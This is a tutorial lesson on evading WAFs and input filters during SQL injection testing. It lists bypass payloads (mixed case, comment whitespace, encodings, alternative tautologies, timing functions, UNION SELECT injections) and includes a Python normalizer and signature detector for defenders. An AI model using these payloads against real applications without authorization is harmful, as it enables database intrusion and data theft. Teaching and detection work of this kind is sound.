Modern applications employ Web Application Firewalls (WAFs) and input filters to block SQL injection. This advanced lesson covers techniques to bypass these defenses when standard payloads are blocked.
Building on our knowledge of various injection techniques, we now focus on evading the defensive measures that prevent these attacks from succeeding.
WAFs typically use signature-based detection, looking for known attack patterns like UNION SELECT, OR 1=1, and common SQL keywords. Understanding how WAFs detect attacks helps in crafting evasion techniques.
Many filters only check for lowercase or uppercase keywords. Mixing case can bypass simple pattern matching.
# Standard payload (might be blocked)
UNION SELECT
# Case variation (might bypass)
UnIoN SeLeCt
# Random case
uNiOn sElEcT

Filters often look for spaces between keywords. Use comments, tabs, or other whitespace characters as alternatives.
# Standard
UNION SELECT
# Using comments as whitespace
UNION/**/SELECT
UNION/*foo*/SELECT
# Using tabs or newlines
UNION%09SELECT
UNION%0ASELECT
# Multiple comments
UNION/*a*/
/*b*/SELECT

Some databases allow splitting keywords with comments or special characters, which can bypass filters looking for complete keywords.
# MySQL keyword splitting
UNI/**/ON SEL/**/ECT
# Using concatenation (MySQL)
CONCAT('UN','ION')
# Using char codes
CHAR(85,78,73,79,78)

Various encoding methods can obfuscate payloads while still being interpreted correctly by the database.
# URL encoding
%55%4E%49%4F%4E %53%45%4C%45%43%54
# Double URL encoding
%2555%254E%2549%254F%254E
# Unicode encoding (MySQL)
%u0055%u004E%u0049%u004F%u004E
# Hex encoding
0x554e494f4e2053454c454354

Using less common SQL syntax can bypass filters that only look for standard patterns.
# Instead of UNION SELECT
UNION ALL SELECT
UNION DISTINCT SELECT
# Instead of OR 1=1
OR 2>1
OR 'a'='a'
OR 1 LIKE 1
# Instead of SLEEP()
BENCHMARK(10000000,SHA1('test'))
# PostgreSQL alternative
pg_sleep() vs generate_series()

💡 Test evasion techniques systematically. Start with simple case variations and progress to more complex encoding if needed.
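The evasions above (case variation, comment and tab whitespace, single and double URL encoding, alternative comparisons and timing functions) all defeat a matcher that compares raw input against literal signatures. The following is an added example, not code from this lesson, showing the defender-side counterpart: a WAF or log-inspection rule normalizes the input first (repeated URL decoding, lowercasing, stripping inline comments, collapsing whitespace) and only then applies signatures. The sample inputs and the signature list are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample inputs: evasion variants from this lesson plus one benign value.
SAMPLES = [
    "UnIoN SeLeCt 1,2,3",                     # mixed case
    "UNION/**/SELECT",                        # comment as whitespace
    "UNION%09SELECT",                         # tab as whitespace
    "UNION/*a*/ /*b*/SELECT",                 # multiple comments
    "%55%4E%49%4F%4E%20%53%45%4C%45%43%54",   # URL-encoded UNION SELECT
    "%2555%254E%2549%254F%254E%2520%2553%2545%254C%2545%2543%2554",  # double-encoded
    "1 OR 2>1",                               # alternative to OR 1=1
    "' OR 'a'='a",                            # string-comparison tautology
    "BENCHMARK(10000000,SHA1('test'))",       # alternative to SLEEP()
    "search term",                            # benign
]

# Illustrative signatures, applied only after normalization.
SIGNATURES = [
    r"\bunion\b\s+(all\s+|distinct\s+)?select\b",
    r"\bor\b\s+\S+\s*(=|>|<|like)\s*\S+",
    r"\b(sleep|benchmark|pg_sleep)\s*\(",
]


def normalize(value: str, max_decode: int = 3) -> str:
    """Canonicalize input so that the evasions above collapse to one form."""
    # Decode URL encoding until stable; bounded so a hostile input cannot loop forever.
    for _ in range(max_decode):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.lower()
    # Inline comments act as whitespace in SQL, so replace them with a space.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # Tabs, newlines and repeated spaces become a single space.
    return re.sub(r"\s+", " ", value).strip()


def matches(value: str) -> list:
    """Return the signatures that fire on the normalized form of value."""
    norm = normalize(value)
    return [pat for pat in SIGNATURES if re.search(pat, norm)]


def scan(values) -> dict:
    """Map each flagged raw input to its normalized form (benign inputs are omitted)."""
    return {v: normalize(v) for v in values if matches(v)}
```

Normalization is what makes the signatures robust to the variants in this lesson; the signatures themselves remain a heuristic, and parameterized queries in the application are the control that actually removes the injection.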
Different injection contexts (string, numeric, ORDER BY) require different bypass techniques.
# String context - break out of quotes
' UNION SELECT 1,2,3--
\' UNION SELECT 1,2,3--
# Numeric context - no quotes needed
1 UNION SELECT 1,2,3--
1 AND 1=1--
# ORDER BY context
ORDER BY 1--
ORDER BY (SELECT 1)--

⚠️ Advanced evasion techniques may violate testing scope agreements. Always confirm that WAF bypass testing is explicitly authorized.